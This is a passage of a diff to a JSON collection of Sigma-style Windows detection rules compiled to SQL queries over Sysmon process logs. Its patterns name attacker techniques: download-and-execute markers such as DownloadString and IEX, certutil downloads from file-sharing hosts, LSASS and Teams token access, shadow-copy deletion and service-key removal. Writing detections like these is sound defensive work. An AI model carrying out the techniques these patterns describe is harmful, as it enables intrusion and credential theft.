"proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": 
"6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects ScreenConnect program starts 
that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": 
"proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml 
C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": 
"test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + 
"title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local 
copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine 
LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or 
script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' 
ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - 